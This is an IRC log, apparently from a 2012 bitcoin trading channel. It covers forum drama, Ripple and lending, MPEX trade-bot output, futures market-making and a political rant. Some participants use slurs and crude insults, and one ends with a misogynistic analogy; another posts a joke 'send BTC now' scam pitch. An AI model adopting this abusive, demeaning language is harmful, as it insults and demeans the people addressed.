13 23:53:30 w/o reason Dec 13 23:53:45 was suggested hes unlocking, empty editing ro something, and locking it back Dec 13 23:53:58 he's done it at least 6 times that I have seen Dec 13 23:54:29 "Today at 03:25:26 PM with a smiley face Dec 13 23:54:35 he just keeps changing the emote it looks Dec 13 23:55:03 A VALID EDIT! Dec 13 23:55:11 his mood changed. Dec 13 23:55:23 this isnt failbook Dec 13 23:55:32 lol his mood changed Dec 13 23:55:36 or myspace Dec 13 23:55:45 why are you so aggressed anyway Dec 13 23:56:10 Ukto: Im not a mod in securities Dec 13 23:56:12 i am tired of it showing up as unread. :P Dec 13 23:56:23 then just ignore the thread Dec 13 23:56:30 or pm the guy Dec 13 23:56:33 yeah, Oh look the bitcoin forum is full of shit and syphalitic fuckheads, I am shocked! Dec 13 23:56:36 he's prolly too noobish to even realise it. Dec 13 23:56:38 yeh I know Dec 13 23:56:43 what is happening Dec 13 23:56:55 call it annoyence at him just pumping extra advertisement for btct.co in a shitty way Dec 13 23:56:57 what am i missing on the forum!>!?!?!? Dec 13 23:57:02 i thnk thats the honesty behind it Dec 13 23:57:12 jcpham: for once there is some drama Dec 13 23:57:19 NO WAY Dec 13 23:57:23 there is no drama Dec 13 23:57:24 <-- drama queen today Dec 13 23:57:26 stop scamming him Dec 13 23:57:26 where can i get my popcorn Dec 13 23:57:34 someone doesnt like someone else on the internet, all is lost Dec 13 23:57:41 show me! Dec 13 23:57:45 IMPOSSIBRU Dec 13 23:57:45 dub: HE NEEDS SCAMMER TAG Dec 13 23:57:46 :P Dec 13 23:58:04 jcpham http://polimedia.us/dtng/c/src/135537171038.jpg Dec 13 23:58:19 yeah errybody should get scammer tag by default when they register Dec 13 23:59:02 yeah the girl that just came in loved that picture btw Dec 13 23:59:06 need a ff plugin to ignore everyone without decent wot rating Dec 13 23:59:20 forum will be like 5 posts then Dec 14 00:00:42 what forums needs is global shitlist groups Dec 14 00:00:55 so you have a bfl group and a mpex group and a hmm... Dec 14 00:01:04 and each group has a common ignore list Dec 14 00:01:17 lol Dec 14 00:01:22 then just decide whose camp you join Dec 14 00:01:24 lets make forums more like highschool Dec 14 00:01:33 it needs a wot Dec 14 00:01:37 web of tards Dec 14 00:01:44 dub they wouldn't know how to use it Dec 14 00:01:51 which is also true of cunt. Dec 14 00:02:08 incidentally, anyone here capable of explaining ripple to me ? Dec 14 00:02:13 cause it seems massively retarded. Dec 14 00:02:18 ignore if ignored by n*people I dont ignore Dec 14 00:03:06 bootstrap it with big list of tards (ie ~half the people on there) Dec 14 00:03:22 you'd get bored tho Dec 14 00:03:28 i think half the fun for ppl is the tards Dec 14 00:06:05 yeah but you have a slider that controls n Dec 14 00:06:53 adjust if you are looking for info or a laugh at some tards Dec 14 00:09:38 someone needs to sell shirt with btc logo on front and "Every Day I Write Here The Name Of Someone Who Scammed Me" on back Dec 14 00:10:31 jesus Dec 14 00:10:34 dub : https://bitcointalk.org/index.php?topic=130264.msg1398343 point in case Dec 14 00:10:35 it'd be full by the end of the week Dec 14 00:10:37 i'm not sure about ripple mircea_popescu Dec 14 00:10:41 I use Linux since 2001, so I know my stuff Dec 14 00:10:50 I just noticed the password is saved in my phone's browser. Dec 14 00:10:59 DMC would need like 3 tshirts just to start with Dec 14 00:11:07 almsot seems like a way to extend credit in a p2p manner Dec 14 00:11:19 jcpham what sense does that make ? Dec 14 00:11:38 no clue Dec 14 00:11:46 like p2p fractional reserve Dec 14 00:12:26 heh Dec 14 00:13:00 so basically this has all the disadvantages of getting married Dec 14 00:13:08 hahaha Dec 14 00:13:08 and as an extra bonus, you don't marry a hot chick. Dec 14 00:13:15 sounds like a winner. Dec 14 00:13:33 ifyou do credit might as well have a centra lbank. Dec 14 00:14:10 I dont see why we keep trying to loan money Dec 14 00:14:23 I mean, loaning money to businesses is one thing, loaning it to private citizens is another Dec 14 00:14:35 i don't see the sense of btc loans either. Dec 14 00:14:40 the reason the world financial system is falling apart is because we keep loaning people money Dec 14 00:14:47 why repeat it with BTC Dec 14 00:14:51 iirc ripple allows o fund from many currencies Dec 14 00:15:05 without all the fake bank fees, most of america would have a shitload of money Dec 14 00:15:12 so your stash would be how to vouch for other people or something? Dec 14 00:15:22 the average american has $50k in debt Dec 14 00:15:24 i don't get it either because loaning people money has already burned me Dec 14 00:15:32 the average american pays more than $50k of interest and fees in their lifetime Dec 14 00:16:01 i leverage my debt is funny USD all the time Dec 14 00:16:05 to increase my position Dec 14 00:16:16 i don't see how it works in ripple though Dec 14 00:16:21 seems rife for theft Dec 14 00:16:25 and fraud Dec 14 00:17:38 and they gave it to me! Dec 14 00:17:43 wait, what? Dec 14 00:18:02 do you not have a mortgage Dec 14 00:18:15 my bank owns my half-million dollar home Dec 14 00:18:18 until i pay them bank Dec 14 00:18:37 Ah, well if the lend it on a house... Dec 14 00:18:39 however now i have an expensive house to borrow against Dec 14 00:19:05 wait... Dec 14 00:19:10 nvm Dec 14 00:19:37 Buy lotta bitcoins now. Dec 14 00:19:50 jcpham: oh, thats not real money Dec 14 00:19:58 I thought you meant they loaned you half a mil in real money Dec 14 00:20:00 free money Dec 14 00:20:15 not free, now they can come and take your house any time they wish Dec 14 00:20:22 ;p Dec 14 00:20:49 seriously, all they have to do is go to a court, claim you failed to pay your mortgage for several months, and then give a false address to ship the court notice to Dec 14 00:21:18 Diablo-D3 you know foreclosure is a net loss for a bank Dec 14 00:21:21 you fail to show up to a court case you never were informed of, the bank gets a default judgement, then begins eviction Dec 14 00:21:30 mircea_popescu: it should be illegal, really Dec 14 00:22:21 why should a bank get the assets Dec 14 00:22:38 if anything, the government should Dec 14 00:23:01 in virtually all cases, the government loaned the money to the bank to loan out in the first place Dec 14 00:24:13 By that logic, why not abolish banks and replace them with government owned banks? And extend that logic to just everything else? Dec 14 00:24:40 Cause all the money used to buy everything is the property of the government to start with so why wouldn't it own everything bought with it? Dec 14 00:24:44 https://bitcointalk.org/index.php?topic=130643.0 Dec 14 00:24:49 seems mtgox btc deposits down Dec 14 00:24:56 Namjies: well, we already DID do that Dec 14 00:25:04 we replaced the entire industry with a piece of software Dec 14 00:25:08 Cause all the money used to buy everything is the property of the government to start with so why wouldn't it own everything bought with it? << bullshit. Dec 14 00:25:29 Namjies: and no, if I have $10 actual dollars in my pocket, its mine Dec 14 00:25:44 banks, unless they're very small regional banks or they're credit unions, are in debt to the government Dec 14 00:25:51 and that was pre-bailout Dec 14 00:28:38 i agree about it not being real money though Dec 14 00:28:58 Yes, so maybe instead the right thing to do would be not print money and give it to banks all the time. Dec 14 00:29:07 well, "we" dont Dec 14 00:29:13 the federal reserve does, which illegally prints money Dec 14 00:29:43 ITC: man that lives with his mom gives property investing advice Dec 14 00:29:57 Does "real money" actually exist? Dec 14 00:30:23 wow that's deep Dec 14 00:31:03 All money is always something we greatly overvalue compared to their inherent use or even complete uselessness. All for the sake of easier trading. Dec 14 00:31:21 dub lol Dec 14 00:31:48 No money has inherently the value it represents. It's all symbolic and trust. Dec 14 00:31:53 dub: who? Dec 14 00:32:26 Diablo-D3: I don't know who else here lives with his mom and gives property investign advice Dec 14 00:32:44 mircea_popescu? Dec 14 00:33:01 hm? Dec 14 00:33:04 he gave property advice? Dec 14 00:33:17 dub: I dunno, who here is young enough to live with their mother? Dec 14 00:33:35 are you trying to say that you finally moved out? Dec 14 00:33:46 moved out of where? Dec 14 00:34:54 last count you lived with your mom Dec 14 00:35:02 my mom died of cancer. Dec 14 00:35:07 good job there, dub. Dec 14 00:35:12 of course she did Dec 14 00:35:40 you need to bait less obviously Dec 14 00:35:51 but im sorry for your loss man Dec 14 00:35:51 this is going well Dec 14 00:39:13 I knew it! Dub works for bfl! Dec 14 00:43:33 [MPEX] [S.MPOE] 4321 @ 0.00059604 = 2.5755 BTC [-] Dec 14 00:43:34 [MPEX] [S.MPOE] 15006 @ 0.00059589 = 8.9419 BTC [-] Dec 14 00:43:46 oh fuck Dec 14 00:44:03 lol I just fucked up Dec 14 00:44:13 lol Dec 14 00:44:14 fuck Dec 14 00:48:38 accidentally defaulted a whole router instead of just one of teh redundant routing engines Dec 14 00:49:44 what routing software are you using? Dec 14 00:50:18 relamen do it in assembly Dec 14 00:50:47 junos Dec 14 00:54:16 dub: sure you don't want to work for google? Dec 14 00:55:09 lolwat? Dec 14 00:56:10 [MPEX] [S.DICE] 1900 @ 0.003395 = 6.4505 BTC [+] Dec 14 00:56:18 [MPEX] [S.MPOE] 4000 @ 0.00059589 = 2.3836 BTC [-] Dec 14 00:57:00 markedathome: I know some people in GOOGs network team, not sure I'd qualify Dec 14 00:57:03 google's crash earlier this week was due to misconfigured routing engines (for the chrome sync I think) Dec 14 00:57:12 oh Dec 14 00:58:17 i would hate to be on the SRE teams... "oh let's pull this out and see what happens to the live system" Dec 14 00:58:34 [MPEX] [S.MPOE] 5139 @ 0.00059618 = 3.0638 BTC [+] Dec 14 00:58:36 [MPEX] [S.MPOE] 4321 @ 0.00059707 = 2.5799 BTC [+] Dec 14 00:58:37 [MPEX] [S.MPOE] 16340 @ 0.0005972 = 9.7582 BTC [+] Dec 14 01:06:55 [MPEX] [S.MPOE] 484 @ 0.0005972 = 0.289 BTC [+] Dec 14 01:06:57 [MPEX] [S.MPOE] 17798 @ 0.0005996 = 10.6717 BTC [+] Dec 14 01:06:58 [MPEX] [S.MPOE] 8586 @ 0.00060161 = 5.1654 BTC [+] Dec 14 01:09:02 [MPEX] [S.MPOE] 18714 @ 0.00060161 = 11.2585 BTC [+] Dec 14 01:11:42 [MPEX] [S.MPOE] 2864 @ 0.00060403 = 1.7299 BTC [+] Dec 14 01:11:43 [MPEX] [S.MPOE] 5826 @ 0.00060692 = 3.5359 BTC [+] Dec 14 01:26:28 scammers could get btcjam front scam ideas here: http://www.crowdcube.com/investment/bike-leasing-company-ltd-12291 Dec 14 01:35:25 The unlickiest S.DICE player? http://blockchain.info/charts/balance?address=1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Dec 14 01:36:03 Another 1800 profit for S.DICE in the last 20 minutes Dec 14 01:39:37 How do you check actual profits? Dec 14 01:42:31 Pull the data into an excel spread sheet and add the columns Dec 14 01:42:32 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Dec 14 01:42:45 Dooglas does a more complete job Dec 14 01:43:01 but this is good for the periods in between posts. Dec 14 01:51:33 Hello Dec 14 01:53:15 hi Dec 14 01:55:16 Any NastyFans in here? Dec 14 01:57:10 came for your glory? Dec 14 01:57:47 Came to answer any questions folks might have. Live with the Og... Dec 14 01:58:27 [MPEX] [S.MPOE] 4321 @ 0.00060625 = 2.6196 BTC [-] Dec 14 01:58:28 [MPEX] [S.MPOE] 9429 @ 0.00060609 = 5.7148 BTC [-] Dec 14 02:00:09 [MPEX] [S.MPOE] 4321 @ 0.00060632 = 2.6199 BTC [+] Dec 14 02:00:10 [MPEX] [S.MPOE] 2829 @ 0.00060609 = 1.7146 BTC [-] Dec 14 02:00:38 OgNasty: are you gonna list on bitfunder? Dec 14 02:00:40 hey og Dec 14 02:00:45 hows thew nw club? :) Dec 14 02:02:03 pigeons: bitfunder looked illegal to me... just like GLBSE... Dec 14 02:02:19 ok then Dec 14 02:02:21 I have no desire to trust another random stranger with an illegal operation. Dec 14 02:02:31 Perhaps a pass-thru in the future maybe... Dec 14 02:02:40 Ukto: The club is going great so far. Dec 14 02:02:56 Far superior to any competition. Dec 14 02:03:23 competition to what? Dec 14 02:05:12 kakobrekla: Exactly. Dec 14 02:06:42 https://bitcointalk.org/index.php?topic=86854.0 Dec 14 02:06:59 kakobrekla: Link to topic of discussion. Dec 14 02:11:54 Even gigavps runs in fear. lol Dec 14 02:14:32 Looks like that's all the questions... Dec 14 02:14:42 Take care bitcoiners. Stay safe. Dec 14 02:15:03 we are asseteers. Dec 14 02:15:12 bitcoin-asseteers Dec 14 02:16:23 the mighty corolla once again has a contiguous exhaust system Dec 14 02:17:06 no longer giving the impression of a passenger jet driving down teh road Dec 14 02:18:22 [MPEX] [S.DICE] 1750 @ 0.00332571 = 5.82 BTC [-] Dec 14 02:21:56 [MPEX] [S.MPOE] 22850 @ 0.00060609 = 13.8492 BTC [-] Dec 14 02:32:40 http://www.masswerk.at/google60/ Dec 14 02:38:21 [MPEX] [S.MPOE] 6692 @ 0.00060609 = 4.056 BTC [-] Dec 14 02:38:33 too slow Dec 14 02:40:37 "Don't worry, I was trained by special ops." "I don't care if you were trained by ninjas, my mother has eyes in the back of YOUR head" Dec 14 02:49:37 [MPEX] [S.MPOE] 19608 @ 0.00060583 = 11.8791 BTC [-] Dec 14 02:49:38 [MPEX] [S.MPOE] 7042 @ 0.00060692 = 4.2739 BTC [+] Dec 14 02:52:48 [MPEX] [S.MPOE] 1667 @ 0.00060264 = 1.0046 BTC [-] Dec 14 02:52:49 [MPEX] [S.MPOE] 1763 @ 0.00060127 = 1.06 BTC [-] Dec 14 02:54:07 [MPEX] [S.MPOE] 17700 @ 0.00060127 = 10.6425 BTC [-] Dec 14 03:01:05 [MPEX] [S.MPOE] 2437 @ 0.00060127 = 1.4653 BTC [-] Dec 14 03:01:06 [MPEX] [S.MPOE] 20400 @ 0.00060124 = 12.2653 BTC [-] Dec 14 03:01:07 [MPEX] [S.MPOE] 9013 @ 0.00059816 = 5.3912 BTC [-] Dec 14 03:07:01 [MPEX] [S.MPOE] 2487 @ 0.00059816 = 1.4876 BTC [-] Dec 14 03:07:02 [MPEX] [S.MPOE] 6644 @ 0.00059589 = 3.9591 BTC [-] Dec 14 03:07:03 [MPEX] [S.MPOE] 17266 @ 0.00059431 = 10.2614 BTC [-] Dec 14 03:13:45 [MPEX] [S.MPOE] 10500 @ 0.00060154 = 6.3162 BTC [+] Dec 14 03:21:36 [MPEX] [S.MPOE] 19200 @ 0.00060154 = 11.5496 BTC [+] Dec 14 03:24:08 [MPEX] [S.MPOE] 3723 @ 0.00060154 = 2.2395 BTC [+] Dec 14 03:24:10 [MPEX] [S.MPOE] 3532 @ 0.00060692 = 2.1436 BTC [+] Dec 14 03:24:11 [MPEX] [S.MPOE] 9000 @ 0.00060725 = 5.4653 BTC [+] Dec 14 03:24:13 [MPEX] [S.MPOE] 5198 @ 0.00060814 = 3.1611 BTC [+] Dec 14 03:24:42 [MPEX] [S.MPOE] 4321 @ 0.00060779 = 2.6263 BTC [-] Dec 14 03:24:43 [MPEX] [S.MPOE] 479 @ 0.00060814 = 0.2913 BTC [+] Dec 14 03:27:47 [MPEX] [S.MPOE] 4321 @ 0.00059924 = 2.5893 BTC [-] Dec 14 03:27:48 [MPEX] [S.MPOE] 690 @ 0.00059917 = 0.4134 BTC [-] Dec 14 03:30:42 early footage of nefario http://i.imgur.com/VzOsR.gif Dec 14 03:35:32 What da fu... Dec 14 03:36:11 That kid probably either regrets this or find it really funny by now Dec 14 03:36:38 [MPEX] [S.MPOE] 12310 @ 0.00059917 = 7.3758 BTC [-] Dec 14 03:36:39 [MPEX] [S.MPOE] 6426 @ 0.00059431 = 3.819 BTC [-] Dec 14 03:37:05 dub: the hell Dec 14 03:39:43 [MPEX] [S.MPOE] 4321 @ 0.00059454 = 2.569 BTC [+] Dec 14 03:39:45 [MPEX] [S.MPOE] 5608 @ 0.00059431 = 3.3329 BTC [-] Dec 14 03:39:46 [MPEX] [S.MPOE] 13771 @ 0.00059419 = 8.1826 BTC [-] Dec 14 03:44:27 [MPEX] [S.MPOE] 4321 @ 0.00060787 = 2.6266 BTC [+] Dec 14 03:44:29 [MPEX] [S.MPOE] 6829 @ 0.00060814 = 4.153 BTC [+] Dec 14 03:49:15 Whoever is dropping the big coin on S.DICE better not make all their money back by the end of the month or I am gonna be pissed Dec 14 03:55:53 lol Dec 14 03:57:24 talked to m00t yesterday about bitcoin :) pretty epic Dec 14 03:57:34 hell, he sent me some btc:) Dec 14 03:58:08 lol moot Dec 14 03:58:34 yeah, but he sent me btc for the failedattempt at the 4chan pass Dec 14 03:58:36 they take btc now Dec 14 03:58:57 m00t seems to be incharge of refunds Dec 14 03:59:19 moot is in charge of ALL OF 4CHAN Dec 14 03:59:38 yeah, but he does not do everything... Dec 14 03:59:45 he still does most of it Dec 14 03:59:49 i see how handing out btc refunds however is something he would want to do Dec 14 04:00:37 id say he is active, but im pretty sure he does not do close to most of the work Dec 14 04:00:56 [MPEX] [S.MPOE] 8450 @ 0.00060779 = 5.1358 BTC [-] Dec 14 04:01:02 been there about 10 years but never had direct contact with m00t, no need to i guess Dec 14 04:03:20 [MPEX] [S.MPOE] 12194 @ 0.00060814 = 7.4157 BTC [+] Dec 14 04:03:21 [MPEX] [S.MPOE] 9109 @ 0.00060934 = 5.5505 BTC [+] Dec 14 04:07:50 [MPEX] [S.MPOE] 4321 @ 0.00060919 = 2.6323 BTC [-] Dec 14 04:07:51 [MPEX] [S.MPOE] 15279 @ 0.00060934 = 9.3101 BTC [+] Dec 14 04:07:53 [MPEX] [S.MPOE] 8235 @ 0.00061001 = 5.0234 BTC [+] Dec 14 04:13:08 [MPEX] [S.MPOE] 4321 @ 0.00060807 = 2.6275 BTC [-] Dec 14 04:13:09 [MPEX] [S.MPOE] 6979 @ 0.00060779 = 4.2418 BTC [-] Dec 14 04:16:16 any recent news? Dec 14 04:16:54 I'm awesome Dec 14 04:16:58 [MPEX] [S.MPOE] 971 @ 0.00060779 = 0.5902 BTC [-] Dec 14 04:16:58 does that count? Dec 14 04:16:59 [MPEX] [S.MPOE] 4979 @ 0.0006036 = 3.0053 BTC [-] Dec 14 04:17:10 satoshi dice is still getting insane action Dec 14 04:17:43 copumpkin: well, only if you were the shit before. I'd say that sort of state change is noteworthy Dec 14 04:17:56 wait, _the_ shit, or just shit? Dec 14 04:18:00 cause it's amazing how different those are Dec 14 04:18:14 _the_ shit ;D Dec 14 04:18:16 lol Dec 14 04:18:17 ok Dec 14 04:20:16 Bugpowder: wow, yeah Dec 14 04:35:29 [MPEX] [S.MPOE] 4321 @ 0.00060985 = 2.6352 BTC [+] Dec 14 04:35:31 [MPEX] [S.MPOE] 979 @ 0.00061001 = 0.5972 BTC [+] Dec 14 04:39:55 If this keeps up, shareholders are either going to get a 10% dividend this month or jack shit Dec 14 04:40:22 or something in between :-/ Dec 14 04:40:30 ;;tslb Dec 14 04:40:32 Time since last block: 42 minutes and 45 seconds Dec 14 04:40:39 ;;ticker Dec 14 04:40:40 BTCUSD ticker | Best bid: 13.65002, Best ask: 13.70000, Bid-ask spread: 0.04998, Last trade: 13.65001, 24 hour volume: 22675.12090777, 24 hour low: 13.46777, 24 hour high: 13.80000, 24 hour vwap: 13.68949 Dec 14 04:41:22 Anybody have a favorite place to scrape BTC and futures prices from for a MM bot? Dec 14 04:41:58 mm? Dec 14 04:42:09 market maker Dec 14 04:42:15 a. Dec 14 04:42:40 thinking of providing some more liquidity for the market in some futures Dec 14 04:42:42 on mpex Dec 14 04:42:55 but need reliable scrapes. Dec 14 04:43:02 or a different source Dec 14 04:43:05 of data Dec 14 04:55:17 Bugpowder: you don't like scraping btc prices from mtgox/bitcoincharts? Dec 14 04:56:19 Bugpowder: and is http://finance.yahoo.com/rssindex good enough for the futures? Dec 14 04:58:47 piamo Dec 14 04:58:49 I was scraping from bitcoincharts Dec 14 04:58:52 piano Dec 14 04:58:58 futures on piano Dec 14 04:59:01 for my google doc of my fund positions Dec 14 04:59:03 err, that's the news feed on yahoo :| Dec 14 04:59:20 [MPEX] [S.MPOE] 4182 @ 0.00060982 = 2.5503 BTC [-] Dec 14 04:59:25 I will check the yahoo thing Dec 14 04:59:56 I have been using barchart.com for the futures Dec 14 05:00:06 thanks for the suggestions Dec 14 05:01:54 what futures you tracking? Dec 14 05:02:23 [MPEX] [S.MPOE] 4321 @ 0.00060389 = 2.6094 BTC [-] Dec 14 05:02:24 [MPEX] [S.MPOE] 11029 @ 0.0006036 = 6.6571 BTC [-] Dec 14 05:02:42 I buy futures on forward contracts Dec 14 05:04:51 Buglouse: bitcoincharts is quickly becoming out of date Dec 14 05:04:57 tcatm has been very afkish Dec 14 05:05:10 he hasnt removed at least one dead exchange Dec 14 05:05:27 and has yet to add ours (emailed him a month ago) Dec 14 05:05:38 I fuck with forex Dec 14 05:05:42 but I used to do futures Dec 14 05:05:57 smickles Dec 14 05:06:13 plate I'm currently offering Gold, Nasdaq100 and Crude for sale on MPEX, but I haven't implemented a true market maker position yet Dec 14 05:06:29 you are doing futures on crude? Dec 14 05:07:16 Trying to figure out what will have the most volume. I thought those would, but people seem more into Corn and the Nikkei Dec 14 05:07:56 reallllly Dec 14 05:07:58 interesting Dec 14 05:07:59 Well MPEX is market making for all of their futures, but I am trying to bring the spread down a bit for buyers of those Dec 14 05:08:03 well Dec 14 05:08:05 if you want free money Dec 14 05:08:12 [MPEX] [S.MPOE] 139 @ 0.00060982 = 0.0848 BTC [+] Dec 14 05:08:14 [MPEX] [S.MPOE] 9787 @ 0.00061001 = 5.9702 BTC [+] Dec 14 05:08:15 [MPEX] [S.MPOE] 3316 @ 0.00061091 = 2.0258 BTC [+] Dec 14 05:08:22 ride out EUR/JPY to 112.. then if it holds there.. ride it to 120 Dec 14 05:08:54 I'm only trading with bitcoin denominated securites now Dec 14 05:09:08 I want to win from a fiat perspective, even when I'm losing Dec 14 05:09:13 thestringpuller: i'm not familiar with the crude market Dec 14 05:09:49 fiat.. isn't it all fiat? Dec 14 05:09:53 thestringpuller Here is the crude http://polimedia.us/bitcoin/mpex.php?mpsic=X.EWTI Dec 14 05:09:55 lol Dec 14 05:09:57 yeah ok Dec 14 05:10:09 relative to paper money Dec 14 05:10:19 anyhow Dec 14 05:10:20 err, gov backed currencies Dec 14 05:10:27 future ES... ride it to 1500 Dec 14 05:10:46 I have plenty of exposure in SP500 Dec 14 05:10:50 think its like 12.25 pip Dec 14 05:10:51 in dollars Dec 14 05:10:54 or some shit Dec 14 05:11:02 oh okay Dec 14 05:11:18 but trading is tough to win over the long term Dec 14 05:11:45 and bitcoin market is small enough that maybe I can play around being a MM and make a little on the spread Dec 14 05:12:10 smickles: help me raise capital for something awesome Dec 14 05:12:35 what's the something awesome? Dec 14 05:12:38 europe is like an ATM right now Dec 14 05:12:41 fucking loving it Dec 14 05:12:47 smickles: help me raise capital for something awesome Dec 14 05:13:22 what do you mean plate Dec 14 05:13:35 give him money to gamble in Forex with Dec 14 05:13:36 [MPEX] [S.MPOE] 4321 @ 0.00061075 = 2.6391 BTC [-] Dec 14 05:13:38 [MPEX] [S.MPOE] 19284 @ 0.00061091 = 11.7808 BTC [+] Dec 14 05:13:39 [MPEX] [S.MPOE] 15646 @ 0.00061126 = 9.5638 BTC [+] Dec 14 05:13:54 i dont speculate Dec 14 05:14:13 EVERYBODY, PROJECT SPLENDIFEROUS IS LAUNCHING!!!1!! GET IN BY SENDING BTC TO 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 NAO!1! Dec 14 05:14:31 thestringpuller: ^ i'm helping :) Dec 14 05:14:33 wat Dec 14 05:14:41 i sent 22mil Dec 14 05:14:44 lol Dec 14 05:14:50 don't do that ffs Dec 14 05:15:06 im like, its smickles, has to be legit, send Dec 14 05:15:17 thestringpuller: but srsly, do you have the good idea already? Dec 14 05:15:19 kakobrekla: market wise Dec 14 05:16:43 I'm long EUR/JPY.. euro is strengthening and yen is weakening Dec 14 05:16:45 a simple media company. i am currently pitching s tvshow/game to adult swim Dec 14 05:17:09 chinese currency is entering the forex markets in Feb '13 Dec 14 05:17:41 when we finish the first phase of pre production for the pilot i can have sit downs with the script and potential studio financeers Dec 14 05:21:10 [MPEX] [S.MPOE] 4321 @ 0.00060383 = 2.6091 BTC [-] Dec 14 05:21:10 [MPEX] [S.MPOE] 1592 @ 0.0006036 = 0.9609 BTC [-] Dec 14 05:25:10 [MPEX] [S.MPOE] 3487 @ 0.0006022 = 2.0999 BTC [-] Dec 14 05:25:12 [MPEX] [S.MPOE] 14602 @ 0.00061126 = 8.9256 BTC [+] Dec 14 05:25:13 [MPEX] [S.MPOE] 2711 @ 0.00061131 = 1.6573 BTC [+] Dec 14 05:28:03 [MPEX] [S.MPOE] 4321 @ 0.000611 = 2.6401 BTC [-] Dec 14 05:28:05 [MPEX] [S.MPOE] 4939 @ 0.00061131 = 3.0193 BTC [+] Dec 14 05:28:06 [MPEX] [S.MPOE] 4640 @ 0.00061185 = 2.839 BTC [+] Dec 14 05:32:19 thestringpuller: I'm not sure that I can help out all that much with funding that sort of project Dec 14 05:42:45 [MPEX] [S.MPOE] 2500 @ 0.00060399 = 1.51 BTC [-] Dec 14 05:42:45 [MPEX] [S.MPOE] 16175 @ 0.00061185 = 9.8967 BTC [+] Dec 14 05:43:31 pigeons : they made one of those bike leasing companies here Dec 14 05:43:39 it failed so laughably... Dec 14 05:43:55 sounds perfect for a btcjam loan Dec 14 05:45:00 hahaha Dec 14 05:45:08 http://www.crowdcube.com/investment/angel-alerts-ltd-12268 Dec 14 05:46:20 what's that ognasty club thing ? Dec 14 05:47:01 ok i'm not telling anybody anymore of these, I'm just gonna start listing them on btct/cryptostocks/bitfunder Dec 14 05:47:12 Whoever is dropping the big coin on S.DICE better not make all their money back by the end of the month or I am gonna be pissed <<< lol. y the haet ?! Dec 14 05:47:17 http://www.crowdcube.com/investment/trampooline-ltd-12051 Dec 14 05:47:31 pigeons list them as Nefario, Inc. Dec 14 05:47:53 yeah i think they will do best on btcjam Dec 14 05:48:07 i'll list as psychoticboy/gigavps/meni/mpoe Dec 14 05:48:44 [MPEX] [S.DICE] 1450 @ 0.00336629 = 4.8811 BTC [+] Dec 14 05:48:46 [MPEX] [S.DICE] 3350 @ 0.00336178 = 11.262 BTC [-] Dec 14 05:48:51 if you list as mpoe http://www.google.com/search?q=catfish+pigeons&complete=0 Dec 14 05:50:25 i still can't believe you hire someone to do your trolling for you Dec 14 05:50:54 does that cunt? <<< which one ? Dec 14 05:51:12 all of them! Dec 14 05:52:43 also, who's plate ? Dec 14 05:53:28 Well MPEX is market making for all of their futures << not at all ? Dec 14 05:53:35 no? Dec 14 05:53:37 who is? Dec 14 05:53:44 I guess it doesn't matter Dec 14 05:53:47 someone is Dec 14 05:54:49 i have no idea Dec 14 05:55:05 but yeah, i said it then, i thought (iirc smickles asked ? ) Dec 14 05:55:12 mpex isn't mm-ing any of them Dec 14 05:55:54 It's interesting that the options MM clearly has very different assumptions about the future price of BTC than the futures MM Dec 14 05:55:57 [MPEX] [S.MPOE] 4321 @ 0.00059693 = 2.5793 BTC [-] Dec 14 05:55:58 [MPEX] [S.MPOE] 1278 @ 0.00059678 = 0.7627 BTC [-] Dec 14 05:56:13 well that explains it lol Dec 14 05:56:24 i don't even think it's mm-ing per se, i think people just threw some bids up Dec 14 05:56:31 devising hedging strategy Dec 14 05:57:03 Those bids disappear every few minutes and reappear, adjusted Dec 14 05:57:13 err Dec 14 05:57:18 maybe I'm thinking of the options Dec 14 05:57:21 nevermind Dec 14 05:57:21 on futures ? Dec 14 05:57:34 cause that'd indeed be mm-ing but so far haven't seen it Dec 14 06:00:55 mpex patented "invisible hand" order matching algorithm Dec 14 06:01:29 any advantage to doing SPLIT over MKOPT? Or is Split just good for straddles and strangles? Dec 14 06:01:34 pigeons invisible fist. Dec 14 06:01:42 Bugpowder less fee. Dec 14 06:01:58 I thought patenting algos was a no-no because then you devulge the secret sauce Dec 14 06:02:21 MKOPT is how much fee? Dec 14 06:02:29 you can have the secret, you need a tpm computer to run it Dec 14 06:02:52 All MKOPT orders are assesed a 2% fee (SPLIT orders are free). Dec 14 06:03:18 [MPEX] [S.MPOE] 4321 @ 0.0006117 = 2.6432 BTC [+] Dec 14 06:03:19 [MPEX] [S.MPOE] 831 @ 0.00061185 = 0.5084 BTC [+] Dec 14 06:03:20 [MPEX] [S.MPOE] 3048 @ 0.00061252 = 1.867 BTC [+] Dec 14 06:03:25 Ah, that is in a different place Dec 14 06:03:34 ya, it's in the faq Dec 14 06:03:38 than the MKOPT description Dec 14 06:03:45 http://polimedia.us/bitcoin/faq.html#12 Dec 14 06:03:48 MKFUT fee is in the description Dec 14 06:03:59 i guess im inconsistent Dec 14 06:03:59 hence my confusion Dec 14 06:04:27 what's up mircea_popescu Dec 14 06:04:42 s.mpoe Dec 14 06:06:33 on the sad news front, seems nobody knows how to price the idiffs Dec 14 06:06:41 not surprising i guess. Dec 14 06:07:18 [MPEX] [S.MPOE] 4321 @ 0.00060774 = 2.626 BTC [-] Dec 14 06:07:19 [MPEX] [S.MPOE] 4321 @ 0.0006076 = 2.6254 BTC [-] Dec 14 06:07:21 [MPEX] [S.MPOE] 13008 @ 0.00060754 = 7.9029 BTC [-] Dec 14 06:08:41 http://www.theblaze.com/stories/they-finally-really-did-it-eu-okays-central-banking-authority-approves-greece-for-another-bailout/ heh Dec 14 06:09:28 “Europe and the eurozone have proved that they are capable of eliminating the challenges that confront them,” said France’s socialist President Francois Hollande. Dec 14 06:09:39 fucking socialists will drive us all in the hole Dec 14 06:09:54 you're right Dec 14 06:10:05 that and lazy people who want a handout Dec 14 06:10:17 I cant stand left wing nuts in the US Dec 14 06:10:49 then the fuckwit french finance minister "lambasts" rich people Dec 14 06:11:00 it's sickening, this. Dec 14 06:11:02 France: lets raise taxes to 75% on the rich!!!... theRich: okay lets move out of Franch Dec 14 06:11:08 now who are they left to tax? Dec 14 06:11:14 they're left to whine. Dec 14 06:11:23 same with the US Dec 14 06:11:30 the rich will just get sick of taxes Dec 14 06:11:36 it's like a stupid bitch that marries some rich dude, won't cook, he tells her she either gets with the programme or gets lost Dec 14 06:11:38 and leave and give up citizenship Dec 14 06:11:40 she bitches Dec 14 06:11:42 then who's left to tax Dec 14 06:11:44 then she gets served divorce papers Dec 14 06:11:47 then she's all teary Dec 14 06:11:59 well... shoulda fucken listen when we were jus' talkin'. Dec 14 06:12:11 